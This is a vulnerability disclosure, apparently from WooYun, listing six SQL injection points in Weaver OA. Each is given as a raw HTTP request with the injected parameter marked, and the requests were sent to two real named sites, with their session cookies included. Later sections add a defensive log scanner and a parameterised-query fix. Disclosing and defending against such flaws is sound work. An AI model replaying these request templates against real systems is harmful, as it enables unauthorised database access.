
Bundle of Universal SQL Injection Vulnerabilities in a 泛微 (Weaver) System (All Versions)

2014-12-24 15:20

My apologies to the websites that got caught in the crossfire~

Sites tested: http://gl.triolion.com/ && http://oaf.yitoa.com:6688/

The version information of each is as follows:

[Image: QQ图片20141109112348.jpg]

[Image: QQ图片20141109112405.jpg]

Note: the first site is used as the main example; cross-checking two of the SQL injections against the second site is enough to show that they are universal.



SQL injection vulnerabilities (6 in total)



1# Injection point 1

Code block:
GET /homepage/Homepage.jsp?hpid=4*&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/wui/main.jsp?templateId=1
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test

[Image: QQ图片20141109110351.jpg]



Also present on the other site:

Code block:
GET /homepage/Homepage.jsp?hpid=21&subCompanyId=21&isfromhp=1&isfromportal=0&hastemplate= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://oaf.yitoa.com:6688/leftFrame.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: oaf.yitoa.com:6688
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4

[Image: QQ图片20141109111035.jpg]





2# Injection point 2

Code block:
GET /page/element/7/News.jsp?ebaseid=7&eid=17*&styleid=1&hpid=4&subCompanyId=1&e71415018052369= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7

[Image: 注入1.jpg]





Also present on the other site:

Code block:
GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: oaf.yitoa.com:6688
DNT: 1
Proxy-Connection: Keep-Alive
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4

[Image: QQ图片20141109111625.jpg]





3# Injection point 3

Code block:
GET /CRM/data/ViewCustomerBase.jsp?requestid=-1*&isrequest=&CustomerID=11613 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/CRM/data/ViewCustomer.jsp?CustomerID=11613*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test

[Image: QQ图片20141109111845.jpg]





4# Injection point 4

Code block:
POST /page/element/compatible/view.jsp?ebaseid=9&eid=23*&styleid=1&hpid=4&subCompanyId=1&e71415018052423= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Content-Length: 0
Accept: */*
Origin: http://gl.triolion.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7

[Image: 注入2.jpg]





5# Injection point 5

Code block:
GET /page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415=' HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7

[Image: 注入3.jpg]





6# Injection point 6

Code block:
GET /proj/data/ViewProject.jsp?ProjID=56* HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/proj/search/searchtask.jsp?e71415500119375=
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test

[Image: 注入4.jpg]

Proof of vulnerability:

Same as above.
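In each of the six requests above the asterisk marks the injected parameter (the sqlmap injection-point convention), and in every case it sits on a parameter the application evidently treats as a numeric ID: hpid, eid, requestid, CustomerID, ProjID. That gives a defender a cheap log-side check. The Python below is an added example, not part of the original report and not Weaver's code: it parses a few constructed Common Log Format lines for the endpoints listed in the report and flags any of those integer-typed parameters whose value is not a plain integer. The endpoint-to-parameter table and the sample log lines are assumptions derived from the requests on this page, not from vendor documentation.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint -> query parameters the application treats as integer IDs.
# Assumed from the six requests in the report above, not from vendor docs.
INTEGER_PARAMS = {
    "/homepage/Homepage.jsp": {"hpid", "subCompanyId"},
    "/page/element/7/News.jsp": {"eid", "hpid", "subCompanyId"},
    "/CRM/data/ViewCustomerBase.jsp": {"requestid", "CustomerID"},
    "/page/element/compatible/view.jsp": {"eid", "hpid", "subCompanyId"},
    "/page/element/Weather/View.jsp": {"eid", "hpid", "subCompanyId"},
    "/proj/data/ViewProject.jsp": {"ProjID"},
}

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')
INT_RE = re.compile(r"-?\d+")


def normalize_path(path):
    """Collapse repeated slashes so '//page/...' maps to the same endpoint."""
    return re.sub(r"/{2,}", "/", path)


def split_target(target):
    """Return (normalized path, raw query string) for a request target.

    A leading '//' would make urlsplit read the first segment as a host name,
    so leading slashes are collapsed before splitting.
    """
    parts = urlsplit(re.sub(r"^/+", "/", target))
    return normalize_path(parts.path), parts.query


def check_request(target):
    """Return [(param, value)] for integer-typed params whose value is not an integer.

    Blank values are ignored: the pages in the report pass empty parameters
    routinely, and a missing ID is not a malformed one.
    """
    path, query = split_target(target)
    expected = INTEGER_PARAMS.get(path)
    if not expected:
        return []
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name in expected and value != "" and not INT_RE.fullmatch(value):
            findings.append((name, value))
    return findings


def scan_log(lines):
    """Scan CLF lines and return one record per request carrying a suspicious ID."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        client, method, target, status = m.groups()
        bad = check_request(target)
        if bad:
            hits.append({"client": client, "method": method,
                         "path": split_target(target)[0],
                         "status": int(status), "params": bad})
    return hits


# Constructed sample log lines (not real traffic from the sites in the report).
LOG_LINES = [
    '10.0.0.5 - - [09/Nov/2014:11:03:51 +0800] "GET /homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [09/Nov/2014:11:04:02 +0800] "GET /homepage/Homepage.jsp?hpid=4%27&subCompanyId=1 HTTP/1.1" 500 312',
    '10.0.0.7 - - [09/Nov/2014:11:16:25 +0800] "GET //page/element/7/News.jsp?ebaseid=7&eid=184%27&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1" 500 2048',
    '10.0.0.9 - - [09/Nov/2014:11:18:45 +0800] "GET /proj/data/ViewProject.jsp?ProjID=56 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit)
```

The check is deliberately type-based rather than signature-based: it does not need a list of SQL keywords, only the knowledge that these parameters are IDs, so a quote, an asterisk or anything else that is not a number stands out regardless of how it is encoded. A 500 status on the same line is a useful secondary signal, since the report's screenshots come from error-based probing.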

Remediation:
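The report leaves the remediation section empty. As an added illustration, not the vendor's fix and not code from the original report, the Python below contrasts the pattern that produces this class of bug, a raw request parameter pasted into the SQL text, with the hardened form: validate that the value is a plain integer, then bind it as a query parameter. It uses an in-memory SQLite table as a constructed stand-in for the application's database (the table and column names are assumptions); a JSP application would do the equivalent with Integer.parseInt and a PreparedStatement.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's homepage table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hpinfo (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO hpinfo VALUES (?, ?)",
                     [(4, "Portal A"), (21, "Portal B")])
    conn.commit()
    return conn


def vulnerable_lookup(conn, hpid):
    """The pattern behind this class of bug: the raw request parameter is
    concatenated into the SQL text, so any character the database parses
    (a quote, an asterisk, a keyword) changes the statement itself."""
    sql = "SELECT name FROM hpinfo WHERE id = " + hpid
    return conn.execute(sql).fetchone()


def parse_id(raw):
    """Accept only a plain (optionally negative) integer string."""
    if not re.fullmatch(r"-?\d+", raw):
        raise ValueError("hpid must be an integer")
    return int(raw)


def hardened_lookup(conn, hpid):
    """Validate the type first, then bind the value as a query parameter.
    The SQL text is constant, so the value can never be parsed as SQL."""
    ident = parse_id(hpid)
    return conn.execute("SELECT name FROM hpinfo WHERE id = ?", (ident,)).fetchone()


def outcome(lookup, conn, raw):
    """Classify what a lookup does with a given raw parameter value:
    ('ok', row), ('rejected', None) for a validation failure, or
    ('sql_error', None) when the database refused the statement."""
    try:
        return ("ok", lookup(conn, raw))
    except ValueError:
        return ("rejected", None)
    except sqlite3.OperationalError:
        return ("sql_error", None)


if __name__ == "__main__":
    db = make_db()
    for value in ["4", "4'", "4*", "21", "99"]:
        print(repr(value),
              "vulnerable:", outcome(vulnerable_lookup, db, value),
              "hardened:", outcome(hardened_lookup, db, value))
```

The database error the vulnerable version raises on a stray quote is exactly the behaviour an error-based probe looks for; the hardened version never lets the value reach the SQL parser, so a malformed ID produces a validation failure the application can log and reject with a 400 instead of a 500.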


Source: www.wooyun.org/bugs/wooyun-2014-082627
